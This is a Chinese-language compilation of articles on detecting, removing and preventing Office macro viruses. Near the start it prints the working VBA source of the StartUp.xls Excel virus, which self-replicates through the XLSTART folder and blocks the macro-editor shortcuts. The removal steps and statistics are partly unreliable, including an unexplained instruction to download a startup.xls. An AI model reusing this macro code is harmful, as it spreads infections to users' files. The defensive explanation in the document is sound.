宏病毒查杀解决方案

宏病毒原理及防范一、常见宏病毒1．startup宏病毒宏病毒其实并不神秘，其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建，新建的文件常放在xlsrt文件夹下。

然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。

下面先看看startup宏病毒代码吧，注意红字部分。

Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd Sub2．book1病毒book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。

最近word文档感染宏病毒解决处理办法：
一、首先要清除掉word模版，Word模板路径在哪里呢？
1、在Windows XP系统中，“我的模板”所在文件夹目录为C:\Documents and
Settings\Administrator\Application Data\Microsoft\Templates；
2、而在Windows Vista或Windows7\windows10系统中，“我的模板”文件夹目录为
Users\Administrator\AppData\Roaming\Microsoft\Templates。

3、特别注意：word2003模版文件名是：normal.dot ，word2007\2010\2016等的
模版文件名是：normal.dotm
4、如果以上目录找不到可能是你电脑隐藏了目录，请在此设置处打开
二、其次是将电脑系统中360杀毒升级到最新版，再进行全盘杀毒。

亲们不要
用金山毒霸杀毒，这个软件不大管用。

如有侵权请联系告知删除，感谢你们的配合！。

StartUp.xls宏病毒清除方法及步骤
StartUp.xls宏病毒的现象：
1.打开excel文件时提示有宏
2.文件不能直接保存，只能另存
3.打开excel文件时，点击"窗口"->"取消隐藏"，会打开一个Startup.xls文件
StartUp.xls宏病毒清除方法及步骤：（excel宏病毒）
第一步：清除C:\Documents and Settings\administrator\Application
Data\Microsoft\Excel\XLSTART下的StartUp.xls；
（注意：其中有些事隐藏文件，你看不到，按照下面说的做就可以看到那些隐藏文件：打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件（推荐）”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。

）第二步：清除C:\Documents and Settings\administrator\Application
Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。

（删除后Excel程序会自动创建部分文件）
第三步：下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。

注：各大杀毒软件多数不能发现此病毒，仅有少数几款，如nod32可以发现，但清除时会直接删除文件，因此在发现此类病毒时，使用上述方法解决，或联系信息中心协助处理。

巧妙解决“宏病毒”作者：孙蓓来源：《电脑知识与技术·经验技巧》2009年第10期在病毒横行的今天,你可能会非常担心自己的Word文档是否感染了电脑病毒,特别是宏病毒。

下面笔者就向大家介绍几种常用的方法。

一、验证:通过保存类型,巧妙鉴别宏病毒如何检查Word是否感染了宏病毒?其实检查的方法很简单。

打开需要检查的文档,单击“文件”菜单栏,选择“另存为”命令,如果对话框中的保存类型固定为“文档模板”,则表示这个文件已经感染了宏病毒,需要用杀毒软件进行清理了,如图1。

当然,你直接用杀毒软件来扫描一下这个文档也未尝不可,毕竟现在不装杀毒软件的用户还是少数。

二、拒绝:设置文档为“只读”属性, 让病毒吃闭门羹因为宏病毒在Word中寄居的文件就是No rmal.dot,所以预防宏病毒的方法其实也很简单,只要把没有感染宏病毒的Normal.dot文件的属性设置为只读,这样宏病毒就不能寄居到Normal.dot中,就能起到预防宏病毒的效果了。

小提示:虽然把一些内容固定的文件设置为具有只读属性,是防止病毒侵入的方法之一,但这也不是万能的,如果病毒制造者注意到这一点,在侵入前先修改你的文件属性,去掉只读属性,那对他们来说也是小菜一碟。

三、查杀:彻底查杀,统统赶走宏病毒宏病毒是通过Word中的宏语言(一种类似VB的语言)编写的,易于传播而且危害巨大,常常能将你花了很多时间编写的文档瞬间“吃掉”,下面介绍使用手工的方法杀掉宏病毒。

单击“工具”菜单栏,选择“宏”,单击“宏”命令(或者使用组合键“Alt+F8”)调出宏对话框,如果在弹出的对话框中有已经记录的宏的话,那就极有可能是宏病毒,删除所有的宏就可以了。

比较复杂的宏病毒会将宏对话框屏蔽掉,这时就需要采用其他方法了。

Word环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中,这时需要重新启动计算机,找到这个文件,并把它删除,再运行Word就可以了。

电脑宏病毒宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

下面由店铺带你走进宏病毒中!让你充分的了解宏病毒!谢谢!宏病毒：一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒;如果WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

来源虽然OFFICE97/Word97无法扫描软盘、硬盘或网络驱动器上的宏病毒。

但当打开一个含有可能携带病毒的宏的文档时，它能够显示宏警告信息。

并且在2013年后的杀毒软件已支持宏病毒扫描。

这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏(例如，单位所用的定货窗体)，打开文档时就包含宏。

如果您并不希望在文档中包含宏，或者不了解文档的确切来源。

例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的Internet节点。

在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择“取消宏”。

OFFICE97软件包安装后，系统中包含有关于宏病毒防护的选项，其默认状态是允许“宏病毒保护”复选框。

如果愿意，您可以终止系统对文档宏病毒的检查。

当Word显示宏病毒警告信息时，清除“在打开带有宏或自定义内容的文档时提问”复选框。

或者关闭宏检查：单击“工具”菜单中的“选项”命令，再单击“常规”选项卡，然后清除“宏病毒保护”复选框。

不过我强烈建议您不要取消宏病毒防护功能，否则您会失去这道防护宏病毒的天然屏障。

上世纪90年代的宏病毒主要感染文件有word、Excel 的文档。

并且会驻留在Normal面板上据统计，通过Internet传播的不同类型的病毒数量如下：DOS型： 10000至11000种Windows型：12种Macintosh型：35种宏病毒： 200余种Unix型： 6种其中10000-11000种DOS型病毒能感染所有DOS、Windows95平台的计算机(但不感染Macintosh计算机);但200余种宏病毒中的大部分能感染所有计算机，包括PC机和Macintosh机。

预防和清除宏病毒的方法摘要：宏是WORD中避免一再的重复相同的动作而设计出来的一种工具，宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

本文首先分析宏病毒的特性，并就如何检测、清除及预防进行了探讨。

关键词：宏病毒；WORD；预防；清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒，就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

宏病毒是一种新形态的计算机病毒，也是一种跨平台式计算机病毒。

1.宏病毒的工作原理在用W O R D 处理文档时，需要同时进行各种不同的动作，每一种动作其实都对应着特定的宏命令。

宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关，这些宏程序可能就是宏病毒的插入点。

病毒包含在宏中时，只要染毒的文件被打开，病毒的宏程序就可能会被执行，进而取得系统控制权，进行感染和破坏。

为了能广泛地传播，宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。

W O R D启动时总是自动打开通用模版，这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。

含有自动宏的染毒文档，当被其他计算机的WORD 打开时，也会自动感染该计算机。